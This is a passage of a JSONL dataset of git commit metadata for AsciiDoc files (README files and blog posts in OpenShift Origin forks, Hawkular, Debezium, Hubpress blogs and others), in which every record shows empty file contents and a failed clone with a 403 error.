y\/origin,bowenha2\/origin,sosiouxme\/origin,oybed\/origin,dcrisan\/origin,ravisantoshgudimetla\/origin,simo5\/origin,tiwillia\/origin,liggitt\/origin,eparis\/origin,ocsbrandon\/origin,pravisankar\/origin,ncdc\/origin,enj\/origin,hroyrh\/origin,miminar\/origin,miminar\/origin,abutcher\/origin,pombredanne\/atomic-enterprise,ravisantoshgudimetla\/origin,dobbymoodge\/origin,adietish\/origin,sseago\/origin,rusenask\/origin,miminar\/origin,louyihua\/origin,ocsbrandon\/origin,hferentschik\/origin,rafabene\/origin,rhamilto\/origin,jwhonce\/origin,mingderwang\/origin,stackdocker\/origin,oybed\/origin,luciddreamz\/origin,christian-posta\/origin,fkirill\/origin,rajatchopra\/origin,juanvallejo\/origin,greyfairer\/openshift-origin,ravisantoshgudimetla\/origin,Tlacenka\/origin,lixueclaire\/origin,fabianofranz\/origin,mkumatag\/origin,joshuawilson\/origin,akram\/origin,gruiz17\/origin,dcrisan\/origin,grdryn\/origin,stefwalter\/origin,YannMoisan\/origin,coreydaley\/origin,matthyx\/origin,StevenLudwig\/origin,sdodson\/origin,childsb\/origin,xiuwang\/origin,tjanez\/origin,jhammant\/origin,mrogers950\/origin,liangxia\/origin,robertol\/origin,maleck13\/origin,wyue-redhat\/origin,greyfairer\/openshift-origin,miminar\/atomic-enterprise,jhammant\/origin,biyiklioglu\/origin,swizzley\/origin,ingvagabund\/origin,mfisher-rht\/origin,hingstarne\/origin,ibotty\/origin,gashcrumb\/origin,stackdocker\/origin,allevo\/origin,sseago\/origin,greyfairer\/openshift-origin,tnguyen-rh\/origin,mfisher-rht\/origin,pravisankar\/origin,samsong8610\/origin,EricMountain-1A\/openshift-origin,codificat\/origin,detiber\/origin,mfisher-rht\/origin,deads2k\/origin,tnguyen-rh\/origin,thesteve0\/origin,hroyrh\/origin,smunilla\/origin,ryanj\/origin,rusenask\/origin,jim-minter\/origin,thrasher-redhat\/origin,Jandersolutions\/origin,rootfs\/origin,joshuawilson\/origin,projectatomic\/atomic-enterprise,dcbw\/origin,pmorie\/origin,wanghaoran1988\/atomic-enterprise,senayar\/origin,miminar\/atomic-enterprise,thrasher-redhat\/origin,ironcladlou\/origin,sjug\/origin,kargakis\/origin,vongalpha\/origin,maxamillion\/origin,pmorie\/origin,mrogers950\/origin,rootfs\/origin,kargakis\/origin,mrogers950\/origin,mnagy\/origin,php-coder\/origin,kargakis\/origin,yarko\/origin,miminar\/atomic-enterprise,sspeiche\/origin,wanghaoran1988\/atomic-enterprise,markllama\/origin,imcsk8\/origin,tnozicka\/origin,swizzley\/origin,maxamillion\/origin,StevenLudwig\/origin,luciddreamz\/origin,zhaosijun\/origin,Jandersoft\/origin,imcsk8\/origin,mrogers950\/origin,smunilla\/origin,wanghaoran1988\/atomic-enterprise,rajatchopra\/origin,tdawson\/origin,y0no\/origin,louyihua\/origin,liggitt\/origin,luciddreamz\/origin,EricMountain-1A\/openshift-origin,sferich888\/origin,rhamilto\/origin,EricMountain-1A\/openshift-origin,samsong8610\/origin,nitintutlani\/origin,mjisyang\/origin,dmage\/origin,senayar\/origin,vongalpha\/origin,ravisantoshgudimetla\/origin,matthyx\/origin,dcbw\/origin,yarko\/origin,akram\/origin,louyihua\/origin,liangxia\/origin,csrwng\/origin,kargakis\/origin,tiwillia\/origin,jhadvig\/origin,wanghaoran1988\/atomic-enterprise,gashcrumb\/origin,danwinship\/origin,rootfs\/origin,linearregression\/origin,marun\/origin,detiber\/origin,sdminonne\/origin,Jandersolutions\/origin,pravisankar\/origin,pacoja84\/origin,danwinship\/origin,hferentschik\/origin,lixueclaire\/origin,liggitt\/origin,goern\/origin,mnagy\/origin,spadgett\/origin,allevo\/origin,thrasher-redhat\/origin,Nick-Harvey\/origin,marsmensch\/atomic-enterprise,biyiklioglu\/origin,stevekuznetsov\/origin,spadgett\/ori
gin,rootfs\/origin,sdodson\/origin,jdnieto\/origin,westmisfit\/origin,linearregression\/origin,cgwalters\/origin,tjcunliffe\/origin,tracyrankin\/origin,arilivigni\/origin,rajkotecha\/origin,rajkotecha\/origin,wjiangjay\/origin,oybed\/origin,legionus\/origin,rafabene\/origin,nitintutlani\/origin,liggitt\/origin,jprukner\/origin,rafabene\/origin,ingvagabund\/origin,rrati\/origin,xuant\/origin,chmouel\/origin,mdshuai\/origin,wjiangjay\/origin,moolitayer\/origin,samsong8610\/origin,yarko\/origin,jim-minter\/origin,wyue-redhat\/origin,HyunsooKim1112\/origin,Jandersolutions\/origin,jwhonce\/origin,grdryn\/origin,greyfairer\/openshift-origin,juanvallejo\/origin,legionus\/origin,Jandersolutions\/origin,ramr\/origin,rhuss\/origin,deads2k\/origin,rchicoli\/openshift-origin,aveshagarwal\/origin,asiainfoLDP\/datafactory,fabianofranz\/origin,gruiz17\/origin,pkdevbox\/origin,zofuthan\/origin,abutcher\/origin,swizzley\/origin,tnguyen-rh\/origin,thesteve0\/origin,quantiply-fork\/origin,mingderwang\/origin,smarterclayton\/origin,linux-on-ibm-z\/origin,rafabene\/origin,miminar\/origin,sosiouxme\/origin,Jandersoft\/origin,elyscape\/origin,HyunsooKim1112\/origin,dmage\/origin,YannMoisan\/origin,domenicbove\/origin,mahak\/origin,simo5\/origin,christian-posta\/origin,linzhaoming\/origin,detiber\/origin,childsb\/origin,thesteve0\/origin,anpingli\/origin,moolitayer\/origin,StevenLudwig\/origin,sallyom\/origin,tagoh\/origin,markllama\/atomic-enterprise,jwhonce\/origin,childsb\/origin,adelton\/origin,codificat\/origin,aveshagarwal\/origin,rrati\/origin,levivic\/origin,smunilla\/origin,jhadvig\/origin,liangxia\/origin,Nick-Harvey\/origin,Tlacenka\/origin,vongalpha\/origin,jwforres\/origin,robertol\/origin,tagoh\/origin,pweil-\/origin,zhaosijun\/origin,louyihua\/origin,pombredanne\/atomic-enterprise,dustintownsend\/origin,biyiklioglu\/origin,miminar\/atomic-enterprise,mjisyang\/origin,rajatchopra\/origin,goern\/origin,rusenask\/origin,romanbartl\/origin,spinolacastro\/origin,tagoh\/origin,rhuss\/origin,elyscape\/origin,sgallagher\/origin,ejemba\/origin,adietish\/origin,bowenha2\/origin,tagoh\/origin,sjug\/origin,tiwillia\/origin,jprukner\/origin,tracyrankin\/origin,marsmensch\/atomic-enterprise,luciddreamz\/origin,westmisfit\/origin,spinolacastro\/origin,soltysh\/origin,sdodson\/origin,stackdocker\/origin,projectatomic\/atomic-enterprise,jhadvig\/origin,enj\/origin,rajkotecha\/origin,ramr\/origin,pecameron\/origin,biyiklioglu\/origin,deads2k\/origin,moolitayer\/origin,fkirill\/origin,ironcladlou\/origin,openshift\/origin,Jandersolutions\/origin,mjisyang\/origin,spohnan\/origin,mkumatag\/origin,senayar\/origin,juanvallejo\/origin,joshuawilson\/origin,jdnieto\/origin,jeremyeder\/origin,ncdc\/origin,sgallagher\/origin,samsong8610\/origin,detiber\/origin,tnozicka\/origin,aweiteka\/origin,mnagy\/origin,pacoja84\/origin,rusenask\/origin,mahak\/origin,mfisher-rht\/origin,sspeiche\/origin,eparis\/origin,sseago\/origin,gesrat-cisco\/origin,sgallagher\/origin,lorenzogm\/openshift-origin,fkirill\/origin,PI-Victor\/origin,craigmunro\/origin,inlandsee\/origin,grdryn\/origin,willmtemple\/origin,rajatchopra\/origin,gruiz17\/origin,ramr\/origin,wjiangjay\/origin,pgmcd\/origin,romanbartl\/origin,sg00dwin\/origin,pgmcd\/origin,romanbartl\/origin,jpeeler\/origin,pecameron\/origin,nak3\/origin,moolitayer\/origin,yepengxj\/df,sdodson\/origin,Nick-Harvey\/origin,ramr\/origin,Miciah\/origin,ncdc\/origin,YannMoisan\/origin,tjcunliffe\/origin,ashcrow\/origin,lorenzogm\/openshift-origin,jwforres\/origin,pombredanne\/atomic-enterprise,abutcher\
/origin,westmisfit\/origin,nhr\/origin,romanbartl\/origin,hingstarne\/origin,spohnan\/origin,akram\/origin,tnguyen-rh\/origin,linzhaoming\/origin,hingstarne\/origin,barrett-vegas-com\/origin,openshift\/origin,willmtemple\/origin,oybed\/origin,yarko\/origin,y0no\/origin,inlandsee\/origin,dkorn\/origin,smunilla\/origin,liangxia\/origin,janetkuo\/origin,sg00dwin\/origin,ryanj\/origin,miminar\/origin,tnguyen-rh\/origin,mingderwang\/origin,jhadvig\/origin,dinhxuanvu\/origin,marsmensch\/atomic-enterprise,asiainfoLDP\/datafactory,jprukner\/origin,jpeeler\/origin,xuant\/origin,knobunc\/origin,xiuwang\/origin,eparis\/origin,tjcunliffe\/origin,aweiteka\/origin,linzhaoming\/origin,spadgett\/origin,craigmunro\/origin,abutcher\/origin,barrett-vegas-com\/origin,dustintownsend\/origin,myfear\/origin,westmisfit\/origin,rhcarvalho\/origin,ejemba\/origin,anpingli\/origin,rhcarvalho\/origin,rhcarvalho\/origin,allevo\/origin,adietish\/origin,bparees\/origin,jhammant\/origin,pacoja84\/origin,PI-Victor\/origin,mfojtik\/origin,raffaelespazzoli\/origin,legionus\/origin,barrett-vegas-com\/origin,StevenLudwig\/origin,jupierce\/origin,nhr\/origin,rhamilto\/origin,gabemontero\/origin,wjiangjay\/origin,rajkotecha\/origin,danwinship\/origin,liangxia\/origin,myfear\/origin,rajkotecha\/origin,xuant\/origin,sspeiche\/origin,wanghaoran1988\/atomic-enterprise,miminar\/atomic-enterprise,ejemba\/origin,spinolacastro\/origin,wanghaoran1988\/origin,cgwalters\/origin,pmorie\/origin,zofuthan\/origin,rajatchopra\/origin,jwforres\/origin,HyunsooKim1112\/origin,wjiangjay\/origin,jupierce\/origin,luciddreamz\/origin,linux-on-ibm-z\/origin,HyunsooKim1112\/origin,craigmunro\/origin,christian-posta\/origin,elyscape\/origin,dustintownsend\/origin,ryanj\/origin,allevo\/origin,hferentschik\/origin,Miciah\/origin,vongalpha\/origin,burmanm\/origin,EricMountain-1A\/openshift-origin,cgwalters\/origin,gesrat-cisco\/origin,liggitt\/origin,spadgett\/origin,domenicbove\/origin,seveillac\/origin,stefwalter\/origin,ingvagabund\/origin,xuant\/origin,vongalpha\/origin,smunilla\/origin,mdshuai\/origin,jhadvig\/origin,gesrat-cisco\/origin,soltysh\/origin,allevo\/origin,jeremyeder\/origin,seveillac\/origin,jsafrane\/origin,wyue-redhat\/origin,mrunalp\/origin,rafabene\/origin,JacobTanenbaum\/origin,lixueclaire\/origin,jpeeler\/origin,bowenha2\/origin,Jandersoft\/origin,stevekuznetsov\/origin,linearregression\/origin,rajatchopra\/origin,jeremyeder\/origin,YannMoisan\/origin,smarterclayton\/origin,dkorn\/origin,tjanez\/origin,juanvallejo\/origin,linzhaoming\/origin,marsmensch\/atomic-enterprise,tagoh\/origin,marsmensch\/atomic-enterprise,levivic\/origin,spinolacastro\/origin,rhamilto\/origin,pweil-\/origin,hferentschik\/origin,dmage\/origin,mjisyang\/origin,gesrat-cisco\/origin,StevenLudwig\/origin,markllama\/atomic-enterprise,tracyrankin\/origin,stefwalter\/origin,linux-on-ibm-z\/origin,jwhonce\/origin,HyunsooKim1112\/origin,tjcunliffe\/origin,luciddreamz\/origin,jeffvance\/origin,gashcrumb\/origin,sgallagher\/origin,markllama\/atomic-enterprise,ibotty\/origin,lorenzogm\/openshift-origin,jhammant\/origin,openshift\/origin,sdodson\/origin,sspeiche\/origin,ashcrow\/origin,tnozicka\/origin,rrati\/origin,craigmunro\/origin,myfear\/origin,pecameron\/origin,oybed\/origin,pgmcd\/origin,dobbymoodge\/origin,zofuthan\/origin,matthyx\/origin,yarko\/origin,ibotty\/origin,adietish\/origin,barrett-vegas-com\/origin,Jandersoft\/origin,linux-on-ibm-z\/origin,grdryn\/origin,sg00dwin\/origin,seveillac\/origin,dustintownsend\/origin,pkdevbox\/origin,zofuthan\/origin,sferich88
8\/origin,fabianofranz\/origin,rhcarvalho\/origin,jupierce\/origin,wanghaoran1988\/origin,seveillac\/origin,dcrisan\/origin,smunilla\/origin,barrett-vegas-com\/origin,stefwalter\/origin,aweiteka\/origin,asiainfoLDP\/datafactory,dgoodwin\/origin,ejemba\/origin,HyunsooKim1112\/origin,senayar\/origin,louyihua\/origin,codificat\/origin,burmanm\/origin,senayar\/origin,childsb\/origin,dobbymoodge\/origin,matthyx\/origin,ocsbrandon\/origin,dgoodwin\/origin,simo5\/origin,sdminonne\/origin,danwinship\/origin,xuant\/origin,abutcher\/origin,mfisher-rht\/origin,jwhonce\/origin,pacoja84\/origin,markllama\/atomic-enterprise,markllama\/atomic-enterprise,sallyom\/origin,knobunc\/origin,Jandersoft\/origin,barrett-vegas-com\/origin,mjisyang\/origin,samsong8610\/origin,burmanm\/origin,mdshuai\/origin,Jandersolutions\/origin,mnagy\/origin,rhuss\/origin,php-coder\/origin,levivic\/origin,dinhxuanvu\/origin,gruiz17\/origin,markllama\/origin,imcsk8\/origin,rafabene\/origin,linux-on-ibm-z\/origin,JacobTanenbaum\/origin,aveshagarwal\/origin,childsb\/origin,joshuawilson\/origin,mrogers950\/origin,thesteve0\/origin,fabianofranz\/origin,stackdocker\/origin,craigmunro\/origin,bowenha2\/origin,raffaelespazzoli\/origin,miminar\/atomic-enterprise,sdodson\/origin,jwforres\/origin,mdshuai\/origin,domenicbove\/origin,jim-minter\/origin,adelton\/origin,dgoodwin\/origin,tiwillia\/origin,gabemontero\/origin,chmouel\/origin,biyiklioglu\/origin,pravisankar\/origin,burmanm\/origin,maxamillion\/origin,pkdevbox\/origin,jdnieto\/origin,sdminonne\/origin,grdryn\/origin,swizzley\/origin,coreydaley\/origin,php-coder\/origin,mrunalp\/origin,smarterclayton\/origin,domenicbove\/origin,stackdocker\/origin,stevekuznetsov\/origin,joshuawilson\/origin,sseago\/origin,yarko\/origin,kargakis\/origin,stackdocker\/origin,EricMountain-1A\/openshift-origin,janetkuo\/origin,goern\/origin,tjanez\/origin,rhcarvalho\/origin,hingstarne\/origin,sseago\/origin,pgmcd\/origin,stefwalter\/origin,thesteve0\/origin,arilivigni\/origin,dgoodwin\/origin,gashcrumb\/origin,ejemba\/origin,Jandersoft\/origin,zhaosijun\/origin,benjaminapetersen\/origin,y0no\/origin,tracyrankin\/origin,ryanj\/origin,mingderwang\/origin,PI-Victor\/origin,seveillac\/origin,wyue-redhat\/origin,asiainfoLDP\/datafactory,Tlacenka\/origin,csrwng\/origin,spinolacastro\/origin,dcrisan\/origin,jupierce\/origin,dinhxuanvu\/origin,markllama\/origin,lixueclaire\/origin,asiainfoLDP\/datafactory,sallyom\/origin,pombredanne\/atomic-enterprise,robertol\/origin,sseago\/origin,tnozicka\/origin,dcbw\/origin,anpingli\/origin,Nick-Harvey\/origin,swizzley\/origin,pkdevbox\/origin,jdnieto\/origin,dobbymoodge\/origin,tjcunliffe\/origin,quantiply-fork\/origin,rusenask\/origin,tdawson\/origin,spinolacastro\/origin,grdryn\/origin,php-coder\/origin","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pravisankar\/origin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7909ba8715f975284740714b2f41524bbf4764e3","subject":"Add project readme.","message":"Add project readme.\n","repos":"jhunovis\/umlaut-search-intellij-plugin","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jhunovis\/umlaut-search-intellij-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"3d9c899cafe326490010a7c82b48cfce52b795fa","subject":"Use master version in upstream master development","message":"Use master version in upstream master development","repos":"objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,ppalaga\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,ppalaga\/hawkular.github.io,lzoubek\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,ppalaga\/hawkular.github.io,metlos\/hawkular.github.io,tsegismont\/hawkular.github.io,metlos\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,metlos\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,lzoubek\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,metlos\/hawkular.github.io,lzoubek\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,ppalaga\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,lzoubek\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/dev\/development.adoc","new_file":"src\/main\/jbake\/content\/docs\/dev\/development.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"72e017192837ec3612c9d3f051b20a2f9af70edb","subject":"Update 2015-10-11-Restoring-an-old-MS-DOS-game-for-the-future.adoc","message":"Update 2015-10-11-Restoring-an-old-MS-DOS-game-for-the-future.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2015-10-11-Restoring-an-old-MS-DOS-game-for-the-future.adoc","new_file":"_posts\/2015-10-11-Restoring-an-old-MS-DOS-game-for-the-future.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"33639574d62fb72bf7288bff52a959ffe622f63e","subject":"Update 2015-01-31-My-English-Title.adoc","message":"Update 2015-01-31-My-English-Title.adoc","repos":"darkfirenze\/darkfirenze.github.io,darkfirenze\/darkfirenze.github.io,darkfirenze\/darkfirenze.github.io","old_file":"_posts\/2015-01-31-My-English-Title.adoc","new_file":"_posts\/2015-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darkfirenze\/darkfirenze.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8bec3ab563f209d697cd352334c6f641a9537a9f","subject":"Update 2016-01-04-Java-8-in-action.adoc","message":"Update 
2016-01-04-Java-8-in-action.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2016-01-04-Java-8-in-action.adoc","new_file":"_posts\/2016-01-04-Java-8-in-action.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b1dd659d892fd585642558a3433c6c83cc723b7","subject":"Update 2016-11-14-My-English-Title.adoc","message":"Update 2016-11-14-My-English-Title.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-11-14-My-English-Title.adoc","new_file":"_posts\/2016-11-14-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f76ff6ae5c4e2f78b08ea4092c0c291ea2a85d7e","subject":"Update 2010-05-16-Le-zoo-est-ouvert.adoc","message":"Update 2010-05-16-Le-zoo-est-ouvert.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2010-05-16-Le-zoo-est-ouvert.adoc","new_file":"_posts\/2010-05-16-Le-zoo-est-ouvert.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c6364e53e0431e4d2a31dcdc0dbb2eaf0a7c44d","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6beb2185908e25faec78806e98b5f056ab32d21f","subject":"Update 2016-03-20-Comment-arreter-de-ronfler.adoc","message":"Update 2016-03-20-Comment-arreter-de-ronfler.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","new_file":"_posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc828b3a3a5f79c761fc1f7bdca6eb94a7b566aa","subject":"0~_posts\/about.adoc1~","message":"0~_posts\/about.adoc1~\n","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/about.adoc","new_file":"_posts\/about.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"42e15c386f35a8fe9cd5e86450082237ae182de4","subject":"Adding blog post about using the container image with KRaft mode","message":"Adding blog post about using the container image with KRaft mode\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"_posts\/2021-08-31-going-zookeeperless-with-debezium-container-image-for-apache-kafka.adoc","new_file":"_posts\/2021-08-31-going-zookeeperless-with-debezium-container-image-for-apache-kafka.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"83092076ae87d0564aa9ccd0bedd1f766d954fba","subject":"DBZ-4260 Blog post for Debezium UI topic auto-creation","message":"DBZ-4260 Blog post for Debezium UI topic auto-creation\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"_posts\/2021-12-01-debezium-ui-topic-groups.adoc","new_file":"_posts\/2021-12-01-debezium-ui-topic-groups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6840e2a887a571b2df4ee751cf339772e9102a2c","subject":"Update README filr from .md to .adoc (#15)","message":"Update README filr from .md to .adoc (#15)\n\n","repos":"sanbornsen\/fabric8-planner,ldimaggi\/fabric8-planner,fabric8io\/fabric8-planner,nimishamukherjee\/fabric8-planner,pmuir\/fabric8-planner,michaelkleinhenz\/fabric8-planner,fabric8-ui\/fabric8-ui,pranavgore09\/fabric8-planner,sanbornsen\/fabric8-planner,sanbornsen\/fabric8-planner,mindreeper2420\/fabric8-planner,almighty\/almighty-ui,pmuir\/fabric8-planner,vikram-raj\/fabric8-planner,fabric8io\/fabric8-ui,nimishamukherjee\/fabric8-planner,almighty\/almighty-ui,michaelkleinhenz\/fabric8-planner,mindreeper2420\/fabric8-planner,nimishamukherjee\/almighty-ui,ldimaggi\/fabric8-planner,ldimaggi\/fabric8-planner,ldimaggi\/fabric8-planner,fabric8io\/fabric8-planner,nimishamukherjee\/almighty-ui,pmuir\/fabric8-planner,sanbornsen\/fabric8-planner,pranavgore09\/fabric8-planner,fabric8-ui\/fabric8-ui,nimishamukherjee\/almighty-ui,debloper\/fabric8-planner,fabric8io\/fabric8-ui,almighty\/almighty-ui,pranavgore09\/fabric8-planner,nimishamukherjee\/fabric8-planner,nimishamukherjee\/almighty-ui,pmuir\/fabric8-planner,vikram-raj\/fabric8-planner,sanbornsen\/fabric8-planner,fabric8io\/fabric8-planner,fabric8io\/fabric8-planner,debloper\/fabric8-planner,fabric8-ui\/fabric8-ui,almighty\/almighty-ui,michaelkleinhenz\/fabric8-planner,fabric8io\/fabric8-planner,mindreeper2420\/fabric8-planner,almighty\/almighty-ui,pranavgore09\/fabric8-planner,fabric8-ui\/fabric8-ui,michaelkleinhenz\/fabric8-planner,mindreeper2420\/fabric8-planner,vikram-raj\/fabric8-planner,debloper\/fabric8-planner,vikram-raj\/fabric8-planner,fabric8io\/fabric8-ui,pmuir\/fabric8-planner,nimishamukherjee\/fabric8-planner,fabric8io\/fabric8-ui,fabric8io\/fabric8-ui,fabric8-ui\/fabric8-ui,debloper\/fabric8-planner","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nimishamukherjee\/fabric8-planner.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"a971ac979a03ff408d6f01b51d86628a7d18d5ed","subject":"Added README","message":"Added README\n","repos":"unbroken-dome\/gradle-gitversion-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/unbroken-dome\/gradle-gitversion-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38b124f85f39eb7938fe76b3ea47449a4aed5861","subject":"update","message":"update\n","repos":"ZihoRo\/gitbook-plugin-asciidoc-include","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ZihoRo\/gitbook-plugin-asciidoc-include.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"122056b72c8f04a9218cb020d92b3023122c02d3","subject":"Create README.asciidoc","message":"Create README.asciidoc","repos":"merose\/diff_drive","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/merose\/diff_drive.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"7c89fa799c29d7c7a00f7e5a38f4fdde81db5ea3","subject":"Create README.asciidoc","message":"Create README.asciidoc","repos":"pryme\/SimplePID,merose\/SimplePID","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pryme\/SimplePID.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"04718cab9045572c0f1f1584a297892e5e0d7a70","subject":"Link to Authentication","message":"Link to Authentication\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Git\/Graded exercices.adoc","new_file":"Git\/Graded exercices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8debc892bba5186f6d5454589d11321fa12e919a","subject":"Update 2016-04-15-S-Q-L-Injection-Intermedio.adoc","message":"Update 2016-04-15-S-Q-L-Injection-Intermedio.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-15-S-Q-L-Injection-Intermedio.adoc","new_file":"_posts\/2016-04-15-S-Q-L-Injection-Intermedio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"634c6f0888119ff04b690c21039defa974d58d71","subject":"Update 2017-01-17-Persimmon-and-Rum-Porridge.adoc","message":"Update 2017-01-17-Persimmon-and-Rum-Porridge.adoc","repos":"zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io","old_file":"_posts\/2017-01-17-Persimmon-and-Rum-Porridge.adoc","new_file":"_posts\/2017-01-17-Persimmon-and-Rum-Porridge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zestyroxy\/zestyroxy.github.io.git\/': The requested URL returned error: 
